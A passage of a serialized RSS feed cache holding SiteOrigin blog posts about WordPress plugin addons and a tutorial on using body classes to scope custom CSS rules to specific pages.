Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4515:\"<p>Take control of your WooCommerce layouts with Page Builder by SiteOrigin. <a href=\"https://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> version <code>1.10.0</code> includes our new WooCommerce Templates addon which allows you to build custom Page Builder templates for the Product, Archives, Shop, Cart, Empty cart, Checkout, and My account pages. Reorganize existing WooCommerce content or add new content, all in the familiar Page Builder interface.</p>\n<p><a href=\"https://siteorigin.com/premium-documentation/plugin-addons/woocommerce-templates/\">View the comprehensive documentation</a>.</p>\n<h3>WooCommerce Template Builder Interface</h3>\n<div id=\"attachment_190486\" style=\"width: 1616px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-190486\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default.jpg\" alt=\"WooCommerce Product Template\" width=\"1606\" height=\"1759\" class=\"size-full wp-image-190486\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default.jpg 1606w, https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default-274x300.jpg 274w, https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default-768x841.jpg 768w, https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default-638x699.jpg 638w, https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default-959x1050.jpg 959w, https://siteorigin.com/wp-content/uploads/2019/08/woocommerce-product-template-default-313x343.jpg 313w\" sizes=\"(max-width: 1606px) 100vw, 1606px\" /></p>\n<p id=\"caption-attachment-190486\" class=\"wp-caption-text\">WooCommerce Product Template</p>\n</div>\n<p>The WooCommerce Template Builder interface is separated into seven tabs:</p>\n<ul>\n<li>Product</li>\n<li>Product archive</li>\n<li>Shop</li>\n<li>Cart</li>\n<li>Empty cart</li>\n<li>Checkout</li>\n<li>My account</li>\n</ul>\n<p>The Product and Product archive tabs allow for multiple templates to be created. A default template can be assigned to all product and product archives pages, individual templates can be applied to specific products or product archives as required.</p>\n<h3>WooCommerce Sections in Widget Form</h3>\n<p>Each WooCommerce page section such as the Product short description or Product data tabs have been provided in widget form. </p>\n<div id=\"attachment_190702\" style=\"width: 2204px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-190702\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets.jpg\" alt=\"WooCommerce product template widgets\" width=\"2194\" height=\"994\" class=\"size-full wp-image-190702\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets.jpg 2194w, https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets-300x136.jpg 300w, https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets-768x348.jpg 768w, https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets-699x317.jpg 699w, https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets-1050x476.jpg 1050w, https://siteorigin.com/wp-content/uploads/2019/08/product-template-widgets-313x142.jpg 313w\" sizes=\"(max-width: 2194px) 100vw, 2194px\" /></p>\n<p id=\"caption-attachment-190702\" class=\"wp-caption-text\">Product template widgets</p>\n</div>\n<p>You can either start out a template with a prebuilt layout or create your own. In addition to existing WooCommerce functionality in widget form you can also add any of the widgets you&#8217;d normally make use of in Page Builder.</p>\n<h3>Compatible Themes</h3>\n<p>This addon supports themes that offer basic WooCommerce support such as <a href=\"https://wordpress.org/themes/vantage/\" target=\"_blank\" rel=\"noopener noreferrer\">Vantage</a>. Themes that have heavily modified WooCommerce templates such as Corp, unfortunately, aren&#8217;t supported. We hope to release a compatibility setting for Corp soon. If you&#8217;re unsure whether your theme will be compatible, feel free to reach out to us via email on <a href=\"mailto:support@siteorigin.com\">support@siteorigin.com</a>, we&#8217;ll gladly take a look.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/woocommerce-templates-page-builder/\">Create WooCommerce Templates with Page Builder</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://siteorigin.com/woocommerce-templates-page-builder/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"22\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"Unique Page Styling with Custom CSS Body Classes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://siteorigin.com/unique-page-styling-custom-css-body-classes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://siteorigin.com/unique-page-styling-custom-css-body-classes/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Aug 2019 14:10:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Tutorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"tutorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=188679\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:587:\"<p>The ability to make a rule specific to a post, page or group of posts is really useful and much easier than you might think. WordPress outputs class names into the body tag of each post or page, we can use those class names to prefix our CSS rules and thereby make them specific to the post, page or group of posts we\'d like to target.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/unique-page-styling-custom-css-body-classes/\">Unique Page Styling with Custom CSS Body Classes</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:7802:\"<p>Cascading Style Sheets (CSS) is the programming language used to style your WordPress pages and posts. If you&#8217;d like to make small style changes that aren&#8217;t available via theme or plugin settings, Custom CSS is a great way to do that. Our <a href=\"https://siteorigin.com/css/\">SiteOrigin CSS</a> plugin offers a visual editor interface as well as a standard Custom CSS field for you to enter your CSS rules. If you aren&#8217;t familiar with CSS basics, our <a href=\"https://siteorigin.com/css/visual-editor/\">visual editor</a> is a great way to get started.</p>\n<p>We chat with many users that are comfortable adding Custom CSS rules but aren&#8217;t quite sure how to apply a particular rule to a page or group of pages. The ability to make a rule specific to a post, page or group of posts is really useful and much easier than you might think. WordPress outputs class names into the body tag of each post or page, we can use those class names to prefix our CSS rules and thereby make them specific to the post, page or group of posts we&#8217;d like to target. In this introductory tutorial, we&#8217;ll cover using your browser&#8217;s developer tool to locate body classes and how to apply them to your Custom CSS rules.</p>\n<h3>Opening Your Browser&#8217;s Developer Tool and Locating the Body Tag</h3>\n<p>To get started, browse to the page on your website that you&#8217;d like to customize. Next, open your browser&#8217;s developer tool either by right-clicking anywhere and selecting Inspect (Inspect Element for Firefox and Safari) or via the keyboard shortcut <code>Control + Shift + I</code> on Windows/Linux or <code>Command + Option + I</code> on Mac. In Chrome and Safari, ensure you&#8217;re viewing the Elements tab, in Firefox ensure you&#8217;re viewing the Inspector tab. Next, locate the <code>body</code> tag, you&#8217;ll find it close to the top of the page&#8217;s source code, just below the closing <code>head</code> tag.</p>\n<div id=\"attachment_189826\" style=\"width: 1585px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-189826\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag.jpg\" alt=\"Developer inspector view of body tag\" width=\"1575\" height=\"372\" class=\"size-full wp-image-189826\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag.jpg 1575w, https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag-300x71.jpg 300w, https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag-768x181.jpg 768w, https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag-699x165.jpg 699w, https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag-1050x248.jpg 1050w, https://siteorigin.com/wp-content/uploads/2019/08/inspector-body-tag-313x74.jpg 313w\" sizes=\"(max-width: 1575px) 100vw, 1575px\" /></p>\n<p id=\"caption-attachment-189826\" class=\"wp-caption-text\">Locate the body tag, just below the closing head tag.</p>\n</div>\n<p>In this example we&#8217;re viewing the <a href=\"https://demo.siteorigin.com/corp/ target=\"_blank\" rel=\"noopener noreferrer\">Corp demo home page</a>. There are two body classes we could use to target this particular page, either <code>home</code> or <code>page-id-31</code>.</p>\n<h3>Using a Page Body Class to Prefix a CSS Rule</h3>\n<p>Let&#8217;s say for example that we&#8217;d like to change the background color of the Corp demo home page footer. The footer background color is defined by the following CSS rule:</p>\n<pre class=\"prettyprint \">.site-footer {\r\n    background: #363a43;\r\n}</pre>\n<p>If we add the above rule to our Custom CSS and change the background value, the rule will be applied to the entire site. However, if we prefix the rule with one of the body classes specific to the home page, it&#8217;ll ensure the rule is only applied to the home page. The two body classes we can choose from are <code>home</code> or <code>page-id-31</code>, either can be used.</p>\n<pre class=\"prettyprint \">.home .site-footer {\r\n    background: #2f333b;\r\n}</pre>\n<p>The above rule will change the background color of the site footer from <code>#363a43</code> to <code>#2f333b</code> and will do so only on the home page. Note the period before the <code>home</code> class name. Class names are prefixed with a period when writing CSS.</p>\n<h3>Common WordPress Body Class Names</h3>\n<p>Below you&#8217;ll find a list of some of the class names used within WordPress. This list is to give you an idea of some of the common class names used but is by no means complete.</p>\n<p><strong>Home:</strong> <code>home</code><br />\nTargets the static home page assigned at <span class=\"adminized-section\"><span class=\"adminized-part\">Settings</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Reading</span></span>.</p>\n<p><strong>Blog:</strong> <code>blog</code><br />\nTargets the blog (posts) page assigned at <span class=\"adminized-section\"><span class=\"adminized-part\">Settings</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Reading</span></span>.</p>\n<p><strong>Pages:</strong> <code>page</code> to target all pages or <code>page-id-x</code> to target a single page.<br />\nReplace <code>x</code> with the ID of the page, you can locate the ID by editing the page and checking the URL, the page ID number will be the only number listed in the URL.</p>\n<p><strong>Posts:</strong> <code>single-post</code> to target all posts or <code>postid-x</code> to target a single post.<br />\nReplace <code>x</code> with the ID of the post, you can locate the ID by editing the post and checking the URL, the post ID number will be the only number listed in the URL.</p>\n<p><strong>Archive:</strong> <code>archive</code><br />\nApplies to all archive pages such as category, tag and author archives.</p>\n<p><strong>Category:</strong> <code>category</code> to target all category pages. <code>category-slug</code> or <code>category-x</code> can be used to target a single category. Replace <code>slug</code> with the category slug or <code>x</code> with the ID number of the category you&#8217;re targetting. Either can be used.</p>\n<p><strong>Tag:</strong> <code>tag</code> to target all tag pages. <code>tag-slug</code> or <code>tag-x</code> can be used to target a single tag. Replace <code>slug</code> with the tag slug or <code>x</code> with the ID number of the tag you&#8217;re targetting. Either can be used.</p>\n<p><strong>Author:</strong> <code>author</code> to target all author pages. <code>author-username</code> or <code>author-x</code> can be used to target a single author. Replace <code>username</code> with the author&#8217;s username or <code>x</code> with the ID number of the author you&#8217;re targetting. Either can be used.</p>\n<p><strong>404:</strong> <code>error404</code></p>\n<p><strong>Search Results:</strong> <code>search-results</code></p>\n<h3>Do More with Siteorigin Premium</h3>\n<p><a href=\"http://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> offers a huge array of additional functionality for Page Builder, the Widgets Bundle and all of our themes. Enhance SiteOrigin CSS with <a href=\"https://siteorigin.com/premium-documentation/plugin-addons/web-font-selector/\">Web Font Selector</a> addon which allows you to easily choose from hundreds of beautiful web fonts right in the visual editor. SiteOrigin Premium also includes access to our next-level email support service, perfect for those times when you need fast and effective technical support.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/unique-page-styling-custom-css-body-classes/\">Unique Page Styling with Custom CSS Body Classes</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://siteorigin.com/unique-page-styling-custom-css-body-classes/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"10\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Announcing the Mirror Widgets Addon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://siteorigin.com/announcing-the-mirror-widgets-addon/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://siteorigin.com/announcing-the-mirror-widgets-addon/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 May 2019 16:38:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:13:\"Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=177070\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:599:\"<p>We\'re excited to announce that version <code>1.9</code> of SiteOrigin Premium introduces the Mirror Widgets addon. Create a widget once, use it everywhere. Update it and the changes reflect in all instances of the widget. The Mirror Widget addon is perfect for information or functionality that you’d like to insert in several places but manage in a single location.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/announcing-the-mirror-widgets-addon/\">Announcing the Mirror Widgets Addon</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1252:\"<p>We&#8217;re excited to announce that version <code>1.9</code> of <a href=\"https://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> introduces the Mirror Widgets addon. Create a widget once, use it everywhere. Update it and the changes reflect in all instances of the widget. The Mirror Widget addon is perfect for information or functionality that you’d like to insert in several pages but manage from a single location. Sliders, banners, contact details and groups of social media icons are just a few of the possible use cases that come to mind. If you&#8217;re currently managing widgets with the same content across multiple pages, we&#8217;re sure you&#8217;ll find this new addon a huge time saver.</p>\n<p><a href=\"https://siteorigin.com/premium-documentation/plugin-addons/mirror-widgets/\">Mirror Widgets documentation</a></p>\n<p>Thanks for reading. If you have any questions or feedback, please let us know in the comments section below. What sort of content might you use the Mirror Widgets addon for?</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/announcing-the-mirror-widgets-addon/\">Announcing the Mirror Widgets Addon</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://siteorigin.com/announcing-the-mirror-widgets-addon/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"14\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:73:\"\n		\n		\n					\n		\n		\n		\n				\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Boost SiteOrigin Plugin Performance with Autoptimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://siteorigin.com/boost-siteorigin-plugin-performance-autoptimize/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://siteorigin.com/boost-siteorigin-plugin-performance-autoptimize/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 30 Apr 2019 20:35:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=174492\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:632:\"<p>Autoptimize is our preferred plugin for reducing page size and improving load time, we use it right here on SiteOrigin.com. In our latest release of the Widgets Bundle, version <code>1.15.6</code> we\'ve added a filter which prevents the exclusion of the <code>/uploads/siteorigin-widgets/</code> folder, ensuring Widgets Bundle stylesheets are concatenation and minified.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/boost-siteorigin-plugin-performance-autoptimize/\">Boost SiteOrigin Plugin Performance with Autoptimize</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1306:\"<p><a href=\"https://wordpress.org/plugins/autoptimize/\" target=\"_blank\" rel=\"noopener noreferrer\">Autoptimize</a> is our preferred plugin for reducing page size and improving load time, we use it right here on SiteOrigin.com. By default, Autoptimize excludes the WordPress uploads folder in its concatenation and minification processes. The SiteOrigin Widgets Bundle stores its stylesheets in the uploads folder. This means that up until now, Widgets Bundle generated stylesheets haven&#8217;t been concatenation and minified by Autoptimize. In our latest release of the Widgets Bundle, version <code>1.15.6</code> we&#8217;ve added a filter which prevents the exclusion of the <code>/uploads/siteorigin-widgets/</code> folder, ensuring Widgets Bundle stylesheets are concatenation and minified. If you&#8217;re using Autoptimize, you&#8217;ll already be taking advantage of this enhancement. If not, we recommend you give it a try.</p>\n<p>Thanks for reading. If you have any questions or comments, please let us know in the comments section below.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/boost-siteorigin-plugin-performance-autoptimize/\">Boost SiteOrigin Plugin Performance with Autoptimize</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://siteorigin.com/boost-siteorigin-plugin-performance-autoptimize/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"Announcing the Image Overlay Addon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://siteorigin.com/announcing-the-image-overlay-addon/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://siteorigin.com/announcing-the-image-overlay-addon/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Apr 2019 13:53:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:13:\"Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=171037\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:577:\"<p>Add beautiful, customizable hover text overlays with animations to your images. Hover overlays are great for galleries, portfolios or any image that would benefit from displaying information on hover. Overlays can be deployed in seconds using the predefined light/dark themes or fully customized using the wide array of style and animation options.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/announcing-the-image-overlay-addon/\">Announcing the Image Overlay Addon</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2992:\"<p>Add 